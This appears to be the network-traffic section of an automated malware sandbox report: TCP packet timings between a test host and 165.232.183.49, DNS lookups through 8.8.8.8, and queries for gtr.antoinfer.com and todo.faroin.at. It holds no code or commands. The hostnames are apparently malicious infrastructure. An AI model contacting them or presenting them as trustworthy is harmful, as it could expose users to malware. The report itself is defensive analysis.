                              Jul 5, 2021 16:52:52.332792997 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.332806110 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.332814932 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.332839966 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.332843065 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.332863092 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.332887888 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.332902908 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.332910061 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.332911015 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.332941055 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.332967997 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.333302021 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.333353996 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.333859921 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.333883047 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.333908081 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.333913088 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.333931923 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.333940983 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.333956003 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.333975077 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.334002018 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.334012032 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.350992918 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.351053953 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.378736019 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.378782034 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.378803015 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.378892899 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.378930092 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.379076004 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.379103899 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.379129887 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.379139900 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.379152060 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.379168034 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.379184961 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.379193068 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.379206896 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.379230976 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.395714045 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.395848036 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.504618883 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.504654884 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.504759073 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.504774094 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.504785061 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.504803896 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.504837990 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.504841089 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.504863024 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.504884958 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.504888058 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.504905939 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.504925013 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.504931927 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.504956007 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:53.579452991 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:53.683702946 CEST4971980192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:53.769519091 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:53.927284002 CEST8049719165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:54.221350908 CEST8049719165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:54.221538067 CEST4971980192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:54.226397991 CEST4971980192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:54.425338984 CEST8049719165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:56.028503895 CEST4972280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:56.028620958 CEST4972180192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:56.211328983 CEST8049722165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:56.211508036 CEST4972280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:56.212973118 CEST4972280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:56.214472055 CEST8049721165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:56.214617968 CEST4972180192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:56.438738108 CEST8049722165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:57.141469002 CEST8049722165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:57.141499996 CEST8049722165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:57.141701937 CEST4972280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:57.154673100 CEST4972280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:57.337320089 CEST8049722165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:58.518258095 CEST4972180192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:33.035018921 CEST4973080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:33.215321064 CEST8049730165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:33.215739965 CEST4973080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:33.216042042 CEST4973080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:33.439104080 CEST8049730165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:34.131033897 CEST8049730165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:34.131167889 CEST4973080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:34.131261110 CEST4973080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:34.206511021 CEST4973280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:34.313606024 CEST8049730165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:34.399720907 CEST8049732165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:34.399892092 CEST4973280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:34.400011063 CEST4973280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:34.400017977 CEST4973280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:34.590183973 CEST8049732165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:34.590219975 CEST8049732165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:35.373759031 CEST8049732165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:35.374105930 CEST4973280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:35.374130011 CEST4973280192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:35.440088034 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:35.562757015 CEST8049732165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:35.638302088 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:35.638442039 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:35.638648987 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:35.880474091 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563668966 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563708067 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563730001 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563750982 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563774109 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563796043 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563812017 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.563818932 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563844919 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563859940 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.563867092 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.563909054 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.566787004 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.568038940 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.761816025 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.761861086 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.761887074 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.761914015 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.761935949 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.761955023 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.761971951 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.761977911 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.762002945 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.762028933 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.762063980 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.762065887 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.762090921 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.762104988 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.762115955 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.762147903 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.762178898 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.762204885 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.762231112 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.762254953 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.762290955 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.767330885 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.767462969 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.908380032 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.908407927 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.908427000 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.908442974 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.908586025 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.960022926 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960048914 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960061073 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960078955 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960095882 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960114002 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960130930 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960146904 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960159063 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960170984 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960192919 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960194111 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.960215092 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960231066 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:36.960244894 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:36.960345984 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.080729961 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080765009 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080787897 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080811024 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080832005 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080853939 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080874920 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080879927 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.080898046 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080919981 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080938101 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080952883 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.080955982 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080975056 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080992937 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.080995083 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.081049919 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.083236933 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.083262920 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.083314896 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.111774921 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.111905098 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.162986040 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.213675976 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.253017902 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253052950 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253078938 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253101110 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253114939 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.253120899 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253142118 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253149986 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.253164053 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253185034 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.253185034 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253206968 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253228903 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253249884 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.253252983 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253274918 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.253276110 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.253330946 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.254265070 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.254312038 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.254333973 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.254378080 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.282330036 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.282422066 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.298419952 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.298453093 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.298543930 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.310678959 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.357930899 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.425456047 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425501108 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425525904 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425551891 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425578117 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425601006 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425620079 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425640106 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425662041 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.425667048 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425695896 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425718069 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425725937 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.425741911 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425750017 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.425765991 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425790071 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.425806046 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.425834894 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.426995039 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.455279112 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.456269026 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.469834089 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.470788956 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.470814943 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.470871925 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.482285023 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.482371092 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.597862005 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.597891092 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.597909927 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.597925901 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.597944021 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.597960949 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.597978115 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.597995043 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.597995043 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.598011971 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.598032951 CEST8049734165.232.183.49192.168.2.5
                              Jul 5, 2021 16:53:37.598045111 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.598078012 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.598176003 CEST4973480192.168.2.5165.232.183.49
                              Jul 5, 2021 16:53:37.797966003 CEST8049734165.232.183.49192.168.2.5

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 5, 2021 16:51:01.270546913 CEST5430253192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:01.331867933 CEST53543028.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:01.667979956 CEST5378453192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:01.699053049 CEST6530753192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:01.714598894 CEST53537848.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:01.771838903 CEST53653078.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:01.874958038 CEST6434453192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:01.924457073 CEST53643448.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:02.543602943 CEST6206053192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:02.590671062 CEST53620608.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:02.913222075 CEST6180553192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:02.968780041 CEST53618058.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:03.848957062 CEST5479553192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:03.908797026 CEST53547958.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:04.064733982 CEST4955753192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:04.112849951 CEST53495578.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:05.693032026 CEST6173353192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:05.743191957 CEST53617338.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:07.313222885 CEST6544753192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:07.363517046 CEST53654478.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:08.972419024 CEST5244153192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:09.018774033 CEST53524418.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:46.663105965 CEST6217653192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:46.734730959 CEST53621768.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:47.465989113 CEST5973653192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:47.466183901 CEST5105853192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:47.466260910 CEST5263653192.168.2.58.8.8.8
                              Jul 5, 2021 16:51:47.517407894 CEST53510588.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:47.522593021 CEST53526368.8.8.8192.168.2.5
                              Jul 5, 2021 16:51:47.522607088 CEST53597368.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:17.521701097 CEST5959653192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:17.585300922 CEST53595968.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:18.815195084 CEST6529653192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:18.870431900 CEST53652968.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:18.996411085 CEST6318353192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:19.051346064 CEST53631838.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:20.333875895 CEST6015153192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:20.383717060 CEST53601518.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:21.265124083 CEST5696953192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:21.312719107 CEST53569698.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:22.149463892 CEST5516153192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:22.195453882 CEST53551618.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:43.393448114 CEST5475753192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:43.450041056 CEST53547578.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:44.827162027 CEST4999253192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:45.206682920 CEST53499928.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:49.596513987 CEST6007553192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:49.654650927 CEST53600758.8.8.8192.168.2.5
                              Jul 5, 2021 16:52:55.675700903 CEST5501653192.168.2.58.8.8.8
                              Jul 5, 2021 16:52:56.007304907 CEST53550168.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:00.252906084 CEST6434553192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:00.311598063 CEST53643458.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:07.856597900 CEST5712853192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:07.915098906 CEST53571288.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:13.344187021 CEST5479153192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:13.398883104 CEST53547918.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:14.337613106 CEST5479153192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:14.386691093 CEST53547918.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:15.353210926 CEST5479153192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:15.408344984 CEST53547918.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:17.372457981 CEST5479153192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:17.421937943 CEST53547918.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:21.384587049 CEST5479153192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:21.431808949 CEST53547918.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:32.439990997 CEST5046353192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:32.490406990 CEST53504638.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:32.693692923 CEST5039453192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:33.031008959 CEST53503948.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:33.528201103 CEST5853053192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:33.600061893 CEST53585308.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:34.146548986 CEST5381353192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:34.205434084 CEST53538138.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:34.465586901 CEST6373253192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:34.538265944 CEST53637328.8.8.8192.168.2.5
                              Jul 5, 2021 16:53:35.383435965 CEST5734453192.168.2.58.8.8.8
                              Jul 5, 2021 16:53:35.439306021 CEST53573448.8.8.8192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Jul 5, 2021 16:52:44.827162027 CEST192.168.2.58.8.8.80xf2f9Standard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                              Jul 5, 2021 16:52:49.596513987 CEST192.168.2.58.8.8.80xdae5Standard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                              Jul 5, 2021 16:52:55.675700903 CEST192.168.2.58.8.8.80x76c2Standard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                              Jul 5, 2021 16:53:32.439990997 CEST192.168.2.58.8.8.80xd2c6Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                              Jul 5, 2021 16:53:32.693692923 CEST192.168.2.58.8.8.80x43c5Standard query (0)todo.faroin.atA (IP address)IN (0x0001)
                              Jul 5, 2021 16:53:34.146548986 CEST192.168.2.58.8.8.80x7a98Standard query (0)todo.faroin.atA (IP address)IN (0x0001)
                              Jul 5, 2021 16:53:35.383435965 CEST192.168.2.58.8.8.80x1cc4Standard query (0)todo.faroin.atA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
